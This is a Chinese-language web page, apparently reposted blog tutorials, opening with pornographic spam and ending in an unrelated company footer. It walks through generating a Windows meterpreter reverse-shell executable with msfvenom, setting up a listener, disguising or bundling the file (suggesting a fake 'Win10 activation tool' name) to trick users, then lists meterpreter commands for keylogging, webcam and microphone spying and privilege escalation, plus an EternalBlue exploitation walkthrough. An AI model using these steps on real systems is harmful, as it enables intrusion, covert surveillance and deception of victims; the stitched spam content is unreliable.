操屁眼的视频在线免费看,日本在线综合一区二区,久久在线观看免费视频,欧美日韩精品久久综

新聞資訊

    最近整理了一些奇安信&華為&深信服大佬的課件資料+大廠面試課題,想要的可以私信自取,無償贈送給粉絲朋友~

    一、什么是msf

    msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用來生成后門的軟件。

    MSFvenom是Msfpayload和Msfencode的組合,將這兩個工具都放在一個Framework實例中。自2015年6月8日起,msfvenom替換了msfpayload和msfencode。

    演示環境

    使用Kali 2021.3進行演示操作

    目標靶機: Win10專業版

    軟件:msfvenom、msfconsole(Kali系統內置)

    二、滲透流程

    1.進入管理員模式

    命令: sudo su

    解釋: 不在管理員模式下運行可能會有權限不夠的提示,為了避免命令執行失敗,在管理員下運行以下命令

    2.生成可執行文件

    命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口號> –f exe –o <文件名>.exe

    解釋: 本地ip寫自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址

    本地端口自己隨便設置一個沒有被占用的端口號,如果端口號被占用那么文件會生成失敗,換一個端口號就性

    文件名可以隨便寫自己喜歡的名字,比如寫Win10激活工具,可能更容易讓目標主機上鉤

    當然MSF也可以用來滲透手機、mac、Linux等

    接下來運行命令生成文件

    默認生成的文件在根目錄下

    把剛才生成的文件放到目標靶機Win10系統中

    3.運行msfconsole命令

    命令: msfconsole

    4.配置參數

    (1)命令: use exploit/multi/handler(選擇模塊)

    (2)命令: set payload windows/meterpreter/reverse_tcp(選擇攻擊模塊)

    (3)命令: set LhOST 192.168.32.1(填寫自己主機的IP地址)

    (4)命令: set lport 1111(填寫剛才生成文件時的端口號)

    (5)命令: show options(查看設置參數)

    (6)命令: exploit -z -j(后臺執行)

    5.在靶機打開可執行文件

    我們這里也可以把這個程序偽裝一下,把他的圖標改一下,或者把它捆綁在某些軟件上面,當用戶打開就自動安裝到對方電腦上面

    6.查看用戶

    (1)命令: sessions(查看上鉤的用戶)
    (2)命令: sessions -i 1(選擇需要攻擊的用戶,這里選擇第 1 個

    三、meterpreter滲透靶機的命令

    1.監控靶機電腦屏幕

    命令: run vnc -i

    2.更多命令

    cmd指令:

    cat 讀取文件內容到屏幕

    cd 更改目錄

    checksum 檢索文件的校驗和

    cp 將源復制到目標

    del 刪除指定文件

    dir 列出文件(ls 的別名)

    下載 下載文件或目錄

    編輯 編輯文件

    getlwd 打印本地工作目錄

    getwd 打印工作目錄

    lcd 更改本地工作目錄

    lls 列出本地文件

    lpwd 打印本地工作目錄

    ls 列出文件

    mkdir 創建目錄

    mv 將源移動到目標

    pwd 打印工作目錄

    rm 刪除指定文件

    rmdir 刪除目錄

    search 搜索文件

    show_mount 列出所有掛載點/邏輯驅動器

    upload 上傳文件或目錄

    pkill 按名稱終止進程

    meterpreter命令:

    keyscan_start 開始捕獲擊鍵(開始鍵盤記錄)

    keyscan_dump 轉儲按鍵緩沖(下載鍵盤記錄)

    keyscan_stop 停止捕獲擊鍵(停止鍵盤記錄)

    record_mic X秒從默認的麥克風record_mic音頻記錄(音頻錄制)

    webcam_chat 開始視頻聊天(視頻,對方會有彈窗)

    webcam_list 單攝像頭(查看攝像頭列表)

    webcam_snap 采取快照從指定的攝像頭(攝像頭拍攝一張照片)

    webcam_stream 播放視頻流從指定的攝像頭(開啟攝像頭監控)

    enumdesktops 列出所有可訪問的桌面和窗口站(窗體列表)

    getdesktop 得到當前的Meterpreter桌面

    reboot 重新啟動遠程計算機

    shutdown 關閉遠程計算機

    shell 放入系統命令 shell

    enumdesktops 列出所有可訪問的桌面和窗口站

    getdesktop 獲取當前的meterpreter桌面

    idletime 返回遠程用戶空閑的秒數

    keyboard_send 發送擊鍵

    keyevent 發送按鍵事件

    keyscan_dump 轉儲擊鍵緩沖區

    keyscan_start 開始捕獲擊鍵

    keyscan_stop 停止捕獲擊鍵

    mouse 發送鼠標事件

    screenshare 實時觀看遠程用戶桌面

    screenshot 抓取交互式桌面的屏幕截圖

    setdesktop 更改 Meterpreters 當前桌面

    uictl 控制一些用戶界面組件

    record_mic 從默認麥克風錄制音頻 X 秒

    webcam_chat 開始視頻聊天

    webcam_list 列出網絡攝像頭

    webcam_snap 從指定的網絡攝像頭拍攝快照

    webcam_stream 播放來自指定網絡攝像頭的視頻流

    play 在目標系統上播放波形音頻文件 (.wav)

    getsystem 嘗試將您的權限提升到本地系統的權限

    execute -f notepad 打開記事本

    ————————————————

    版權聲明:本文為CSDN博主「HonkerG」的原創文章

    原文鏈接:https://blog.csdn.net/RFZ_322/article/details/123367668


    1. 準備工作(兩臺虛擬機需要在同一網段下,將網絡配置設置為橋接模式即可)。

    1.win7旗艦版sp1(靶機)

    2.kali (攻擊機)

    二、

    1.查看攻擊機和靶機的IP

    2.在kali里用msfconsole命令運行MSF

    (奇奇怪怪的圖案)

    3.使用命令search ms17_010,會顯示相關的模塊

    4.我們選擇第一個,輸入use exploit/windows/smb/ms17_010_eternalblue該模塊

    5.用show options查看模塊的配置項

    如圖,我們還缺少一個靶機的IP,配置該選項:set RHOST IP

    6.show targets用來查看該模塊適用的操作系統

    這個模塊只有這一個。。。所以不需要設置

    7.使用run執行攻擊,sysinfo查看靶機的操作系統,screenshot截圖,shell進入靶機的cmd界面,此時界面為亂碼,輸入執行phcp 65001即可解決

    8.現在我們可以對靶機為所欲為了

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有